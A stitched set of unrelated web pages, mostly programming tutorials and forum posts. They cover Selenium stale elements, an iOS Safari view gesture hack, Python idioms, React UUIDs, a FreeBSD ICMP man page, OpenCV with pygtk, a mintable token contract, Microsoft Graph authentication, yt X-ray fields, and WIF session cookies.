searchBox; public void searchFor(String text) { searchBox.sendKeys(text); } In the above example, a proxy would be configured for every Web Element when the page gets initialised. Every time we use a WebElement it will go and find it again so we shouldn’t see StaleElementException. This approach would solve your stale element problem at most of the places except some corner cases which I will cover in the next approach. Refreshing the Element whenever it gets stale: When you work on a modern, reactive, real-time application developed in technologies like Angularjs/Reactjs which has hell lot of data and there is a persistent web-socket connection which keep pushing data to your browser and which makes your dom to change. Let’s take an example of a stock exchange where there a data grid which displays real-time information and data keeps changing too frequently. In this case, whenever the data gets changed at server-side, the changes will be pushed automatically to your UI grid and depending on your data your respective rows or cells will get stale. Here, Page factory can not help as most of your grid elements are dynamic and you cannot configure their locators while initiliazing your page. Also if you have created your own data model to prase data, than it is difficult to configure Page Factory accross all your data model classes. To deal with this problem I decided to develop a generic method to refresh the element in case it gets stale. To refresh an element, we first need to figure out its By locator but Selenium API has not exposed anything to re-construct the locator from an existing web element. I was fortunate that they have exposed a toString method on WebElement which print all the locators being used to build that element. Let’s see the below example where we are finding an element which is a child of another element: WebElement elem1 = driver.findElement(By.xpath("//div[@id='searchform']")); WebElement elem2 = elem1.findElement(By.cssSelector("input[name='q'")); System.out.println(elem2.toString()); Output of the above code would be: [[[[ChromeDriver: chrome on XP (bd6a0d83229c67d5f7e6060b1bd768e9)] -> xpath: //div[@id='searchform']]] -> css selector: input[name='q'] Now we have to apply all the reverse-engineering to build the element again from this String. Thanks to Reflection API in Javawhich can help us to dynamically execute the code to build the element. Here is the final implementation: WebElement refreshedElement = StaleElementUtils.refreshElement(elem2); This refreshElement method will check if the element is stale then it will re-fetch the element from the dom. So for all the data grid elements which can get stale anytime, we can use this method as a precautionary measure to avoid stale element exception. Please feel free to share your thoughts on my approach and would love to know, how you have handled this interesting exception. Please follow and like us: import com.sahajamit.selenium.driver.DriverManager; what is this sir? Can you please share your Drivermanager class which you have imported here.. Python is a high-level, interpreted, interactive and object-oriented scripting language. Python is designed to be highly readable. It uses English keywords frequently where as other languages use punctuation, and it h as fewer syntactical constructions than other languages.python interview questions and answers I am really happy with your blog because your article is very unique and powerful for new reader. Selenium Training in Chennai | Selenium Training in Bangalore | Selenium Training in Pune This comment has been removed by the author. +1 hi, mind sharing com.sahajamit.selenium.driver.DriverManager with us? Thank you so much for such valuable information sharing. It’s highly appreciated.Interesting and informative article…very useful to me, please keep on updating.. AWS Training AWS Training in Chennai Thanks you for sharing the article. The data that you provided in the blog is infromative and effectve. Through you blog I gained so much knowledge. Also check my collection at selenium Online Training Blog Hi Naveen, your explanation is really great, just anted to check, can you explain on StaleElementUtils class and the methods, Great Article Final Year Project Domains for CSE Final Year Project Centers in Chennai JavaScript Training in Chennai JavaScript Training in Chennai
http://naveenautomationlabs.com/mystery-of-staleelementreferenceexception-in-selenium-webdriver/
CC-MAIN-2020-24
en
refinedweb
In iOS 9 Apple introduced SFSafariViewController. In a nutshell it pretty much runs full Safari in your app. This is great as user gets all Keychain passwords, Safari extensions access, cookies, session data, etc. All of that done securely as the SFSafariViewController spins up a separate process, so that the app does not have access to SFSafariViewController’s content (More info here). That’s all great, however there is problem. Result of pushing SFSafariViewController in UINavigationsController is loss of default bar behaviour, which looks pretty bad. So really, only option is to present it modally. This has is own drawbacks. Apple has made unfortunate choice of placing the done button to top right corner. This makes it very difficult to dismiss when using the phone one handed. Although, I don’t really think positioning it anywhere else would solve the problem. Now standard swipe from the edge of the screen gesture really is the way to go. My solution to this problem is to trade swiping from the edge to go back in browsing history for dismissing view view controller. I create a subclass of SFSafariViewController and add a 5 points wide UIView to it. View covers its entire height. Background colour of the view is imperceptibly transparent white. Right thing to do would be to override hitTest: and have it entirely transparent, but this is quick and dirty hack :-). This view is in app’s process and therefore accessible to us. import UIKit import SafariServices class SCSafariViewController: SFSafariViewController { var edgeView: UIView? { get { if (_edgeView == nil && isViewLoaded()) { _edgeView = UIView() _edgeView?.translatesAutoresizingMaskIntoConstraints = false view.addSubview(_edgeView!) _edgeView?.backgroundColor = UIColor(white: 1.0, alpha: 0.005) let bindings = ["edgeView": _edgeView!] let options = NSLayoutFormatOptions(rawValue: 0) let hConstraints = NSLayoutConstraint.constraintsWithVisualFormat("|-0-[edgeView(5)]", options: options, metrics: nil, views: bindings) let vConstraints = NSLayoutConstraint.constraintsWithVisualFormat("V:|-0-[edgeView]-0-|", options: options, metrics: nil, views: bindings) view?.addConstraints(hConstraints) view?.addConstraints(vConstraints) } return _edgeView } } private var _edgeView: UIView? } In presentation completion handle I add UIScreenEdgePanGestureRecognizer to our edge view. @IBAction func showSafariViewController(sender: AnyObject){ let safariViewController = SCSafariViewController(URL: NSURL(string: "")!) safariViewController.delegate = self; safariViewController.transitioningDelegate = self self.presentViewController(safariViewController, animated: true) { () -> Void in let recognizer = UIScreenEdgePanGestureRecognizer(target: self, action: "handleGesture:") recognizer.edges = UIRectEdge.Left safariViewController.edgeView?.addGestureRecognizer(recognizer) } } Then it’s a simple matter of creating custom transition animation. It’s a standard boiler plate. I also add shadow when transitioning views, to mimic UINavigation’s controller push and pop animations. Included in sample code. I really think this is the least bad trade off. In reality swipe from the edge to go to previous page in SFSafariViewController still works. You have to swipe from very close to the edge, but not quite. No one will know about this, so it’s useless. Sample project can be found here. Repo currently only contains Swift sample. As I need it for my ObjC only app, I will add ObjC sample as well soon. For questions or suggestions Im @stringcode. Thank you for reading!
http://www.stringcode.co.uk/push-pop-modal-sfsafariviewcontroller-hacking-swipe-from-edge-gesture/
CC-MAIN-2020-24
en
refinedweb
On Wed, 13 Jun 2001, Neil Macneale wrote: > In article <9g5fc4$m8u$01$1 at news.t-online.com>, "Jochen Riekhof" > <jochen at riekhof.de> wrote: > > > I am missing something like the c/Java ?: operator. > > The ?: operator is overrated. For the time you save typing, you > are wasting someone else's because they need to figure out what you were > thinking. Trust me, this is true. Compare the following actual examples: public static final String aan(String s) { char x = s.charAt(0); return ((( x == 'a') || (x == 'e') || (x == 'i') || (x == 'o') || (x == 'u') || (x == 'A') || (x == 'E') || (x == 'I') || (x == 'O') || (x == 'U')) ? "an " : "a " ); } def aan(name): """Utility which returns 'a' or 'an' for a given noun. """ if string.lower(name[0]) in ('a','e','i','o','u'): return 'an ' else: return 'a ' Now, if you're getting paid per line of code, I could see how the first example works better for you... but this was the *least* convoluted use of the ? operator in all of the code that I could find; and I think it's pretty clear which approach looks nicer. > > if elif else is not a proper substitute for switches, as the variable in > > I have found that using a dictionary of function pointers sometimes gives > the switch statement feel. For example, point to constructors... > > cases = {"dog": Dog, "cat": Cat, "rabbit": Rabbit} > > def createPet(type="cat"): > if casses.has_key(type): return casses[type]() #Good input... > else: return None # bad input, or 'default' in C/java The idiom that I've come to particularly like in Python, given a case like that: class PetShop: def pet_cat(self, name): ... def pet_dog(self, name): ... def pet_dinosaur(self, name): ... def buyPet(name="pooky", petType="cat"): petFunc = getattr(self, "pet_%s" % petType, None) if petFunc: return petFunc(name) else: # 'default' case mentioned above; usually raise something > The above code is generally hard to read, so use sparingly and comment > well. The thing I like about it is that the keys can be of any type. One > problem is that all the functions called are going to need similar > parameters, but sometimes its a usefull trick. If you use the specially-named-methods approach, it's almost self-documenting! I use this all over the place and I really like the way it helps to organize code (it also makes testing easier, since each method can be tested separately). It's like you can invent your own "adjectives" to describe methods. try-doing-*that*-in-java-ly y'rs, ______ __ __ _____ _ _ | ____ | \_/ |_____] |_____| |_____| |_____ | | | | @ t w i s t e d m a t r i x . c o m
https://mail.python.org/pipermail/python-list/2001-June/077346.html
CC-MAIN-2020-24
en
refinedweb
sample of getting console key Sample code of how to get key hit. readable() function in Serial class can check buffer has data or not. This could be equivalent to kbhit() function of DOS/Win environment. main.cpp - Committer: - okano - Date: - 2016-04-09 - Revision: - 0:06c67ac20cd3 File content as of revision 0:06c67ac20cd3: #include "mbed.h" Serial pc( USBTX, USBRX ); BusOut leds( LED4, LED3, LED2, LED1 ); int main() { while (1) { if ( pc.readable() ) { leds = pc.getc() - '0'; } } }
https://os.mbed.com/users/okano/code/getting_console_key_sample/file/06c67ac20cd3/main.cpp/
CC-MAIN-2020-24
en
refinedweb
In this blog post, We will learn how to Generate Unique Identifier - UUID in react js with examples. Sometimes we need to have a use case like the generation of Unique random identifier or UUID. UUID is a unique value which is not repeated. UUID will be mostly used to identify the visitor or user identification for session values and also for privacy functionality, Chat applications GUID is a 128-bit value that divided into five groups separated by a hyphen GUID is a 128-bit value that divided into five groups separated by a hyphen. This will code works on react and React Native libraries React is popular UI framework for building UI web and mobile applications UUID generation can be integrated into many ways. 1 Write custom code to write Use UUID npm package This is popular npm package for nodejs applications. We can write out custom code component in the application. This is a popular npm uuid package for nodejs applications This example We are going to learn how to generate Unique ID on a button click The following questions are answered with This example Here are the steps for the example code import React, { Component } from 'react'; import './App.css'; import {default as UUID} from "uuid"; class App extends Component { componentWillMount() { this.id = UUID.v4(); } constructor(props) { super(props); this.state = { id: '' } this.updateState = this.updateState.bind(this); }; updateState() { this.setState({id: UUID.v4()}) } render() { return ( <div> <label>{this.state.data}</label> <button onClick = {this.updateState}>Click Me</button> </div> ); } } export default App; Recent posts Related posts
https://www.cloudhadoop.com/2018/10/react-uuid-component-generator-example
CC-MAIN-2020-24
en
refinedweb
There is often a trade-off when it comes to efficiency of CPU vs memory usage. In this post, I will show how the lru_cache decorator can cache results of a function call for quicker future lookup. from functools import lru_cache @lru_cache(maxsize=2**7) def fib(n): if n == 1: return 0 if n == 2: return 1 return f(n - 1) + f(n - 2) In the code above, maxsize indicates the number of calls to store. Setting it to None will make it so that there is no upper bound. The documentation recommends setting it equal to a power of two. Do note though that lru_cache does not make the execution of the lines in the function faster. It only stores the results of the function in a dictionary.
https://brandonrozek.com/blog/pymemoization/
CC-MAIN-2020-24
en
refinedweb
NAME¶ icmp — Internet Control Message Protocol SYNOPSIS¶ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> int socket(AF_INET, SOCK_RAW, proto); DESCRIPTION¶¶ ICMP messages are classified according to the type and code fields present in the ICMP header. The abbreviations for the types and codes may be used in rules in pf.conf(5). The following types are defined: The following codes are defined: MIB Variables¶ packets/second. If set to zero, no limiting will occur. Defaults to 200. - icmplim_output - (boolean) Enable/disable logging of ICMP replies bandwidth limiting. Defaults to true. - drop_redirect - (boolean) Enable/disable dropping of ICMP Redirect packets. Defaults to false. - log_redirect - (boolean) Enable/disable logging of ICMP Redirect packets. Defaults to false. - bmcastecho - (boolean) Enable/disable ICMP replies received via broadcast processed before all others. By default, continue with normal source selection. Enabling this option is particularly useful on routers because it makes external tracer. - tstamprepl - (boolean) Enable/disable replies to ICMP Timestamp packets. Defaults to true. ERRORS¶. SEE ALSO¶ recv(2), send(2), inet(4), intro(4), ip(4), pf.conf(5) HISTORY¶ The icmp protocol appeared in 4.3BSD.
https://manpages.debian.org/unstable/freebsd-manpages/icmp.4freebsd.en.html
CC-MAIN-2022-05
en
refinedweb
OpenCV with pygtk In my previous post, I have shown how to integrate OpenCV with pygtk to show images. In this post, I’ll be showing how to use OpenCV/SimpleCV with pygtk to show multiple images simultaneously, a continuous streaming of images (like a video), etc. I have used multi-threading to call gtk.main() because if I don’t do that, my program will be stuck untill, gtk.main() doesn’t end. It doesn’t end untill gtk.main_quit() is explicitly called. import gtk from threading import Thread import gobject gtk.gdk.threads_init() As I have mentioned before, gtk.gdk.threads_init() is necessary. The gtk.gdk.threads_init() function initializes PyGTK to use the Python macros that allow multiple threads to serialize access to the Python interpreter (using the Python Global Interpreter Lock (GIL)).The gtk.gdk.threads_init() function must be called before the gtk.main() function. At this point in the application the Python GIL is held by the main application thread. You can get more information about gtk.gdk.threads_init() and GIL here in pygtk docs. class DisplayImage(): def __init__(self,title="SimpleCV"): self.img = None self.img_gtk = None self.done = False self.thrd = None self.win = gtk.Window() self.win.set_title(title) self.win.connect("delete_event",self.leave_app) self.image_box = gtk.EventBox() self.win.add(self.image_box) def show_image(self,image): self.img = image if self.img_gtk is None: self.img_flag=0 self.img_gtk = gtk.Image()# Create gtk.Image() only once self.image_box.add(self.img_gtk)# Add Image in the box, only once self.img_pixbuf = gtk.gdk.pixbuf_new_from_data(self.img.tostring(), gtk.gdk.COLORSPACE_RGB, False, self.img.depth, self.img.width, self.img.height, self.img.width*self.img.nChannels) self.img_gtk.set_from_pixbuf(self.img_pixbuf) self.img_gtk.show() self.win.show_all() if not self.img_flag: self.thread_gtk() # gtk.main() only once (first time) self.img_flag=1 # change flag def thread_gtk(self): # changed this function. Improved threading. self.thrd = Thread(target=gtk.main, name = "GTK thread") self.thrd.daemon = True self.thrd.start() def leave_app(self,widget,data): self.done = True self.win.destroy() gtk.main_quit() def isDone(self): return self.done def quit(self): self.done = True self.win.destroy() gtk.main_quit() So, here’s the complete class that I made to show images in OpenCV/SimpleCV. In line 26, self.img_gtk.set_from_pixbuf(self.img_pixbuf) In my previous post it was image = gtk.image_new_from_pixbuf(img_pixbuf) So, here’s the problem with it. Whenever I do gtk.image_new_from_pixbuf(), it would create a new gtk.Image object at a different address, and hence we would have to add the new object in the box every time and destroy the previous image object which was there in the box. So, instead of that I have used gtk.set_from_pixbuf(), which would not create a new gtk.Image object, but just change the image. Now moving on to threading part, it’s very important that you call gtk.main with a thread. And it has to be called only once during the program, otherwise there would be many threading problems. gtk.main has to be called after you have created widgets, added properties and shown. thrd = Thread(target=gtk.main, name = "GTK thread") thrd.daemon = True thrd.start() After creating the thread, thrd.daemon = True is very necessary before you start the thread, otherwise there will be too many errors and complications with gtk. Believe me, I have faced it for two days. And it was not good. I have added more functionalities in DisplayImage class such as getting co-ordinates of mouse click, etc. You can find it here on my GitHub. You can also find some examples that I have worked out for SimpleCV there. So, now some examples. Show image in OpenCV. from cv2.cv import * from pygtk_image import DisplayImage import time image = LoadImage("Image name") image_rgb = CreateImage((image.width,image.height),image.depth,image.channels) CvtColor(image,image_rgb,CV_BGR2RGB) # iplImage has BGR colorspace display = DisplayImage() display.show(image_rgb) time.sleep(3) display.quit() Show image in SimpleCV from SimpleCV import * from pygtk_image import DisplayImage import time image = Image("lenna") display = DisplayImage(title="SimpleCV") display.show(image.toRGB().getBitmap()) time.sleep(3) display.quit() Show multiple images simultaneously in SimpleCV from SimpleCV import * from pygtk_image import * d1 = DisplayImage() d2 = DisplayImage() i1 = Image("lenna") while not (d1.isDone() or d2.isDone()): try: d1.show_image(i1.toRGB().getBitmap()) time.sleep(0.1) d2.show_image(i1.toGray().getBitmap()) time.sleep(0.1) except KeyboardInterrupt: d1.quit() d2.quit() Show images in a series in SimpleCV from SimpleCV import * from pygtk_image import * def loadimage(): image = Image("lenna") d = DisplayImage() d.show_image(image.toRGB().getBitmap()) time.sleep(3) d.show_image(Image("simplecv").toRGB().getBitmap()) time.sleep(2) d.quit() if __name__ == "__main__": loadimage() show captured images from camera in SimpleCV from SimpleCV import * from pygtk_image import * cam = Camera() d = DisplayImage() while not d.isDone(): try: i = cam.getImage() i.drawRectangle(d.mouseX,d.mouseY,50,50,width=5) d.show_image(i.applyLayers().toRGB().getBitmap()) time.sleep(0.1) except KeyboardInterrupt: d.quit() break If you find some better way to show images using pygtk, or a better way to thread gtk.main(), let me know. P.S. Anxiously waiting for GSoC 2012 results. Only 2 days and 8 hours to go. Playing around with Android UI Articles focusing on Android UI - playing around with ViewPagers, CoordinatorLayout, meaningful motions and animations, implementing difficult customized views, etc.
https://jayrambhia.com/blog/opencv-with-pygtk
CC-MAIN-2022-05
en
refinedweb
Coinex Smart Chain (hereinafter referred to as CSC) is one of the best blockchain platforms for creating crypto tokens or building DApps, Coinex Smart Chain (CSC) is represented as a super secure blockchain platform in the crypto space, CSC blockchain supports multiple token standards for token building, such as CRC20, CRC721 NFT, CRC115 and build smart contracts and decentralized applications. CRC20 tokens are commensurate tokens, which means that all units of CRC20 tokens have the same value with each other & CRC20 tokens can be traded on DEX or CEX platforms. Anyone can print CRC20 tokens freely on the coinex smart chain blockchain, you can use trumple , hardhat or Remix IDE. In the previous article we discussed how to make standard fix supply RC20 tokens, but in this article I will provide a tutorial on how to “Create Mintable Token CRC20”. Mintable is a feature on CRC20 tokens that allows to increase supply at any time, usually this is used for StableCOIN (FIAT) tokens or game reward tokens that are set for Unlimited Supply. The Mintable feature allows you to print any amount at any time. Create Mintable Token CRC20 Coinex Smart Chain 1. Prepare Wallet EVM & Coin native Coinex Smart Chain (CET) You can use the wallet metamask browser or android smartphone, but for convenience we recommend you use the wallet metask browser. Buy CET coins on “Coinex Exchange“, CET coins are used to pay gas fees when creating CRC20 token smart contracts, token minting processes and several other transactions. For all this process you only need 10 CET coins or the equivalent of $0.63, this fee is very cheap when compared to ethereum which has to prepare $75-$150 to create a smart contract. 2. Solidity Smart Contract. # Solidity Smart Contract (Standart). pragma solidity ^0.8.4; import "@openzeppelin/contracts/token/ERC20/ERC20.sol"; contract CryptoVIRMintableToken is ERC20 { constructor() ERC20("CryptoVIR Mintable Token", "CVRM1") { _mint(msg.sender, 1000 * 10 ** decimals()); } } # Mintable Feature The following are the mintable features that you need to input into your smart contract, so that your CRC20 token has a mintable function import "@openzeppelin/contracts/access/Ownable.sol"; function mint(address to, uint256 amount) public onlyOwner { _mint(to, amount); } # Combined Results of the Smart Contract above This solidity smart contract is what you need to input into remixethereumIDE, // SPDX-License-Identifier: MIT pragma solidity ^0.8.4; import "@openzeppelin/contracts/token/ERC20/ERC20.sol"; import "@openzeppelin/contracts/access/Ownable.sol"; contract CryptoVIRMintableToken is ERC20, Ownable { constructor() ERC20("CryptoVIR Mintable Token", "CVRM1") { _mint(msg.sender, 1000 * 10 ** decimals()); } function mint(address to, uint256 amount) public onlyOwner { _mint(to, amount); } } 3. Deploy Mintable Token CRC20 I use RemixEthereumIDE to deploy smart contracts, make sure your wallet is filled with some CET coins. # Go to the remix.ethereum.org site, connect your wallet, create a new sol file and enter the solidity smart contract code # Use compiler version 0.8.4 , click “Auto Compile” and “Enable Optimization 200” # Wait for the complie process to finish, make sure there are no warnings or errors during compilation, make sure a green check appears on the left # In the ENVIRONMENT section select “Injected Web3” # ACCOUNT : Select the wallet you use to deploy the smart contract # CONTRACT : Choose your smart contract name, for example “CryptoVIRMintableToken” # Click “Deploy” and confirm “Confirm” on your wallet # Wait 3-5 seconds, and check the status of your transaction in the block explorer, once fully confirmed, your token will be printed on the coinex smart chain blockchain # Process deploy completed, The smart contract is completely on the blockchain, and the tokens are minted according to the initial minting amount when first deployed. 4. How to Use CRC20 Minting Feature Minting is a feature to add token supply, you can use RemixEthereumIDE or do the minting process on the Coinex blockchain explorer (CSC). in this article I will show you how to mint in RemixEthereumIDE. # Because the token that we are deploying uses Decimal 18, then when you want to mint, you must add a number (ZERO) with the number 18. My example will mint 3000 tokens, then what we have to input is 3000000000000000000000 # Enter RemixEthereumIDE, scroll to the bottom of “Deployed Contract“, you will see a smart contract that has been deployed, click the smart contract # Click the “Mint” button, In the “to” field, enter the address that will receive the token and enter “amount” the number of tokens you want to mint. Click “transact” + confirm on your wallet # After the minting process is complete, the supply of tokens will increase according to the number of tokens you are minting GOOD LUCK
https://cryptovir.com/how-to-create-mintable-token-crc20-coinex-smart-chain/
CC-MAIN-2022-40
en
refinedweb
#include <lte-test-uplink-sinr.h> Definition at line 60 of file lte-test-uplink-sinr.h. TestCase Srs. Definition at line 318 of file lte-test-uplink-sinr.cc. References NS_LOG_INFO. Definition at line 328 of file lte-test-uplink-sinr.cc. Implementation to actually run this TestCase. Subclasses should override this method to conduct their tests. Instantiate a single receiving LteSpectrumPhy Generate several calls to LteSpectrumPhy::StartRx corresponding to several signals. One will be the signal of interest, i.e., the LteSpectrumSignalParametersUlSrsFrame of the first signal will have the same CellId of the receiving PHY; the others will have a different CellId and hence will be the interfering signals Build packet burst (Data and interference) Schedule the reception of the data signals plus the interference signals Check that the values passed to LteSinrChunkProcessor::EvaluateSinrChunk () correspond to known values which have been calculated offline (with octave) for the generated signals Implements ns3::TestCase. Definition at line 333 of file lte-test-uplink-sinr.cc. References ns3::LteSpectrumSignalParametersUlSrsFrame::cellId, ns3::SpectrumSignalParameters::duration, ns3::LteTestSinrChunkProcessor::GetSinr(), m_sinr, m_sm, m_sv1, m_sv2, NS_LOG_INFO, NS_TEST_ASSERT_MSG_SPECTRUM_VALUE_EQ_TOL, ns3::SpectrumSignalParameters::psd, and ns3::SpectrumSignalParameters::txPhy. Definition at line 72 of file lte-test-uplink-sinr.h. Definition at line 71 of file lte-test-uplink-sinr.h. Definition at line 69 of file lte-test-uplink-sinr.h. Definition at line 70 of file lte-test-uplink-sinr.h.
https://www.nsnam.org/docs/release/3.20/doxygen/class_lte_uplink_srs_sinr_test_case.html
CC-MAIN-2022-40
en
refinedweb
In the process of refactoring an internal tool that connects to the Microsoft Graph API I re-worked the process of retrieving an authentication token that is needed for making a request to the MS Graph API. While doing some research on how to best get the needed access token, I came across the Microsoft Authentication Library for JavaScript. The library "enables both client-side and server-side JavaScript applications to authenticate users using Azure AD for work and school accounts (AAD), Microsoft personal accounts (MSA), and social identity providers". That sounds exactly what I was looking for, even though in our use case, we don't authenticate users but an application. To get the access token that we need to authenticate against the MS Graph API, we need to create an ConfidentialClientApplication and pass clientId, clientSecret (both information you get when creating an application in AAD) and optionally the authority which is like the tenant you want to query: const clientConfig = { auth: { clientId: 'your_client_id', clientSecret: 'your_client_secret', authority: 'your_authority', } }; const clientCredentialRequest = { scopes: [""], }; const cca = new msal.ConfidentialClientApplication(clientConfig); const response = await cca.acquireTokenByClientCredential(clientCredentialRequest); console.log(response.accessToken); How can we integrate this with the Microsoft Graph client library for JavaScript that we are using? Luckily, the SDK is pretty extensible. We have to create a class that implements the AuthenticationProvider interface to return the needed access token to the MS Graph API client. This is how we implemented the logic: import {AuthenticationProvider, AuthenticationProviderOptions} from "@microsoft/microsoft-graph-client"; import * as msal from "@azure/msal-node"; export class ClientTokenAuthProvider implements AuthenticationProvider { private readonly clientId: string; private readonly clientSecret: string; private readonly tenantId: string; public constructor(clientId: string, clientSecret: string, tenantId: string) { this.clientId = clientId; this.clientSecret = clientSecret; this.tenantId = tenantId; } /* eslint-disable @typescript-eslint/no-unused-vars */ public async getAccessToken(authenticationProviderOptions: AuthenticationProviderOptions | undefined): Promise<string> { const clientConfig = { auth: { clientId: this.clientId, clientSecret: this.clientSecret, authority: ''+this.tenantId, } }; const clientCredentialRequest = { scopes: [""], }; const cca = new msal.ConfidentialClientApplication(clientConfig); const response = await cca.acquireTokenByClientCredential(clientCredentialRequest); if (response === null) { throw new Error('Not able to retrieve MS Graph API Authtoken!'); } return Promise.resolve(response.accessToken); } } We pass the clientId, clientSecret and the tenantId when creating the class instance. The tenantId variable is used to create the authority URL which will limit the scope of all queries to our own tenant, e.g. no external users are able to authenticate this way. With the help of the ConfidentialClientApplication class we query the authentication token from the Microsoft webservice and return it. To make the MS Graph API client aware of the ClientTokenAuthProvider, we need to create a ClientOptions configuration and configure the ClientTokenAuthProvider instance: import {ClientTokenAuthProvider} from "infrastructure/msgraph/clientTokenAuthProvider"; import {Client, ClientOptions} from "@microsoft/microsoft-graph-client"; const clientId = '...'; const clientSecret = '...'; const tenantId = '...'; const clientOptions: ClientOptions = { authProvider: new ClientTokenAuthProvider(clientId, clientSecret, tenantId) }; const client = Client.initWithMiddleware(clientOptions); Now when querying the MS Graph API, the Javascript client will automatically authenticate itself and pass the authentication token back to the MS Graph API on each call: const response = await client.api(`/users`).get();
https://blog.bitexpert.de/blog/msgraph_with_msal_auth
CC-MAIN-2022-40
en
refinedweb
This functionality provides the ability to create metallicity-dependent X-ray luminosity, emissivity, and photon emissivity fields for a given photon energy range. This works by interpolating from emission tables created from the photoionization code Cloudy or the collisional ionization database AtomDB. These can be downloaded from from the command line like so: # Put the data in a directory you specify yt download cloudy_emissivity_v2.h5 /path/to/data # Put the data in the location set by "supp_data_dir" yt download apec_emissivity_v2.h5 supp_data_dir The data path can be a directory on disk, or it can be "supp_data_dir", which will download the data to the directory specified by the "supp_data_dir" yt configuration entry. It is easiest to put these files in the directory from which you will be running yt or "supp_data_dir", but see the note below about putting them in alternate locations. Emission fields can be made for any energy interval between 0.1 keV and 100 keV, and will always be created for luminosity $(\rm{erg~s^{-1}})$, emissivity $\rm{(erg~s^{-1}~cm^{-3})}$, and photon emissivity $\rm{(photons~s^{-1}~cm^{-3})}$. The only required arguments are the dataset object, and the minimum and maximum energies of the energy band. However, typically one needs to decide what will be used for the metallicity. This can either be a floating-point value representing a spatially constant metallicity, or a prescription for a metallicity field, e.g. ("gas", "metallicity"). For this first example, where the dataset has no metallicity field, we'll just assume $Z = 0.3~Z_\odot$ everywhere: import yt ds = yt.load("GasSloshing/sloshing_nomag2_hdf5_plt_cnt_0150") xray_fields = yt.add_xray_emissivity_field(ds, 0.5, 7.0, table_type='apec', metallicity=0.3) Note: If you place the HDF5 emissivity tables in a location other than the current working directory or the location specified by the "supp_data_dir" configuration value, you will need to specify it in the call to add_xray_emissivity_field: xray_fields = yt.add_xray_emissivity_field(ds, 0.5, 7.0, data_dir="/path/to/data", table_type='apec', metallicity=0.3) Having made the fields, one can see which fields were made: print (xray_fields) ['xray_emissivity_0.5_7.0_keV', 'xray_luminosity_0.5_7.0_keV', 'xray_photon_emissivity_0.5_7.0_keV'] The luminosity field is useful for summing up in regions like this: sp = ds.sphere("c", (2.0, "Mpc")) print (sp.quantities.total_quantity("xray_luminosity_0.5_7.0_keV")) 7.452771760764334e+44 erg/s Whereas the emissivity fields may be useful in derived fields or for plotting: slc = yt.SlicePlot(ds, 'z', ['xray_emissivity_0.5_7.0_keV','xray_photon_emissivity_0.5_7.0_keV'], width=(0.75, "Mpc")) slc.show() The emissivity and the luminosity fields take the values one would see in the frame of the source. However, if one wishes to make projections of the X-ray emission from a cosmologically distant object, the energy band will be redshifted. For this case, one can supply a redshift parameter and a Cosmology object (either from the dataset or one made on your own) to compute X-ray intensity fields along with the emissivity and luminosity fields. This example shows how to do that, Where we also use a spatially dependent metallicity field and the Cloudy tables instead of the APEC tables we used previously: ds2 = yt.load("D9p_500/10MpcBox_HartGal_csf_a0.500.d") # In this case, use the redshift and cosmology from the dataset, # but in theory you could put in something different xray_fields2 = yt.add_xray_emissivity_field(ds2, 0.5, 2.0, redshift=ds2.current_redshift, cosmology=ds2.cosmology, metallicity=("gas", "metallicity"), table_type='cloudy') Now, one can see that two new fields have been added, corresponding to X-ray intensity / surface brightness when projected: print (xray_fields2) ['xray_emissivity_0.5_2.0_keV', 'xray_luminosity_0.5_2.0_keV', 'xray_photon_emissivity_0.5_2.0_keV', 'xray_intensity_0.5_2.0_keV', 'xray_photon_intensity_0.5_2.0_keV'] Note also that the energy range now corresponds to the observer frame, whereas in the source frame the energy range is between emin*(1+redshift) and emax*(1+redshift). Let's zoom in on a galaxy and make a projection of the intensity fields: prj = yt.ProjectionPlot(ds2, "x", ["xray_intensity_0.5_2.0_keV", "xray_photon_intensity_0.5_2.0_keV"], center="max", width=(40, "kpc")) prj.set_zlim("xray_intensity_0.5_2.0_keV", 1.0e-32, 5.0e-24) prj.set_zlim("xray_photon_intensity_0.5_2.0_keV", 1.0e-24, 5.0e-16) prj.show() Warning: The X-ray fields depend on the number density of hydrogen atoms, given by the yt field H_nuclei_density. In the case of the APEC model, this assumes that all of the hydrogen in your dataset is ionized, whereas in the Cloudy model the ionization level is taken into account. If this field is not defined (either in the dataset or by the user), it will be constructed using abundance information from your dataset. Finally, if your dataset contains no abundance information, a primordial hydrogen mass fraction (X = 0.76) will be assumed. (XrayEmissionFields.ipynb; XrayEmissionFields_evaluated.ipynb; XrayEmissionFields.py)
https://yt-project.org/doc/analyzing/analysis_modules/xray_emission_fields.html
CC-MAIN-2018-22
en
refinedweb
On a plane between Philadelphia and Oslo: I am flying there for NDC2010, where I have a couple of sessions (on WIF. Why do you ask?:-)). It’s a lifetime that I want to visit Norway, and I can’t tell you how grateful to the NDC guys to have me!. Sessions and Network Load Balancers By default, session cookies written by WIF are protected via DPAPI, taking advantage of the RP’s machine key. Such cookies are completely opaque to the client and anybody else who does not have access to that specific machine key. This works well when all the requests in the context of a user session are all aimed at the same machine: but what happens when the RP is hosted on multiple machines, for example in a load balanced environment? A session cookie might be created on one machine and sent to a different machine at the next postback: unless the two machines share the same machine key, a cookie originated from machine A will be unreadable from machine B. There are various solutions to the situation. One obvious one is using sticky sessions, that is to say guaranteeing that a session beginning with machine A will keep referring to A for all the subsequent requests. I am not a big fan of that solution, as it dampen the advantages of using a load balanced environment. Furthermore, you may not always have a say in the matter – if you are hosting your applications on third party infrastructure (such as Windows Azure) your control on the environment will be limited. Another solution would be synchronizing the machine keys of every machine. I like this better than sticky sessions, but there is one that I like even better. Most often than not your RP application will use SSL, which means that you need to make the certificate and corresponding private key available on every node: it makes perfect sense to use the same cryptographic material for securing the cookie in load balancer friendly way. WIF makes the process of applying the strategy above in ASP.NET applications really trivial: the following code illustrates how it could be done. public class Global : System.Web.HttpApplication { //…); } protected void Application_Start(object sender, EventArgs e) { FederatedAuthentication.ServiceConfigurationCreated += OnServiceConfigurationCreated; } Instead of the usual inline approach, this time I am showing you the codebehind file global.asax.cs. OnServiceConfigurationCreated is, surprise surprise, a handler for the ServiceConfigurationCreated event and fires just after WIF read the configuration: if we make changes here we have the guarantee that will be applied already from the very request coming in. Note: It is worth noting that, contrary to what various samples out there would lead you to believe, OnServiceConfigurationCreated is pretty much the only WIF event handler that should be associated to its event in the Application_Start. This has to do with the way (and the number of times) in which ASP.NET invokes the handlers though the application lifetime. The code is pretty self-explanatory. It creates a new list of CookieTransform, which take care of cookie compression, encryption and signature. The last two take advantage of the RsaxxxxCookieTransform, taking in input the certificate defined for the RP in the web.config. Note: Why do we sign the cookie, wouldn’t be enough to encrypt it? If we use the RP certificate, encryption would not be enough. Remember, the RP certificate is a public 